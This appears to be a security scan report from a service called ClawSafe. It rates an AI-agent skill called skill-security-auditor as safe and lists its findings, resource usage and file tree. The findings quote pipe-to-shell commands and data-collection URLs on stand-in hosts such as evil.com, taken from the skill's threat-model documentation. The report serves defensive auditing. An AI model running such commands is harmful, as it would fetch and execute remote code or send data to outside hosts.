skill-security-auditor Security Report — Trusted | ClawSafe

5 /100

skill-security-auditor

Security audit and vulnerability scanner for AI agent skills before installation

The Skill Security Auditor is a legitimate defensive security tool that scans AI agent skills for malicious patterns. All flagged IOCs are documented attack patterns used for detection examples, not actual malicious code.

Skill Nameskill-security-auditor

Duration35.4s

Enginepi

✓

Safe to install

This skill is safe to install. It is a security auditing tool designed to detect the very patterns it appears to contain as examples in its threat model documentation.

Resource	Declared	Inferred	Status	Evidence
Filesystem	`NONE`	`READ`	✓ Aligned	Uses Path.read_text() for scanning skill files (line 447)
Network	`NONE`	`READ`	✓ Aligned	Subprocess git clone only; no direct network requests in scanner
Shell	`NONE`	`READ`	✓ Aligned	Safe subprocess usage only
Environment	`NONE`	`NONE`	—	No environment variable access
Skill Invoke	`NONE`	`NONE`	—	No skill invocation capabilities
Clipboard	`NONE`	`NONE`	—	No clipboard access
Browser	`NONE`	`NONE`	—	No browser capabilities
Database	`NONE`	`NONE`	—	No database access

2 Critical 6 findings

💀

Critical Dangerous Command 危险 Shell 命令

curl ... \| sh

references/threat-model.md:55

💀

Critical Dangerous Command 危险 Shell 命令

curl -s https://setup.evil.com/init.sh | bash

references/threat-model.md:190

🔗

Medium External URL 外部 URL

https://evil.com/collect

SKILL.md:116

🔗

Medium External URL 外部 URL

https://analytics.evil.com/log?d=

references/threat-model.md:162

🔗

Medium External URL 外部 URL

https://setup.evil.com/init.sh

references/threat-model.md:190

🔗

Medium External URL 外部 URL

https://evil.com/ping\\\

references/threat-model.md:212

File Tree

3 files · 55.2 KB · 1491 lines

Python 1f · 1049L Markdown 2f · 442L

├─ ▾ 📁 references

│ └─ 📝 threat-model.md Markdown 271L · 9.9 KB

├─ ▾ 📁 scripts

│ └─ 🐍 skill_security_auditor.py Python 1049L · 37.7 KB

└─ 📝 SKILL.md Markdown 171L · 7.7 KB

Security Positives

✓ Uses safe subprocess.run() with capture_output=True and no shell=True

✓ Comprehensive pattern detection for 50+ attack vectors

✓ Scans for prompt injection including hidden characters and HTML comments

✓ Includes typosquatting detection for 15+ popular packages

✓ Filesystem scanning for hidden files, binaries, symlinks, and SUID bits

✓ Detailed remediation guidance for each finding

✓ Supports both local directory and git repo auditing

✓ Clean separation between documentation (threat model examples) and actual code

Scan Report

File Tree

Security Positives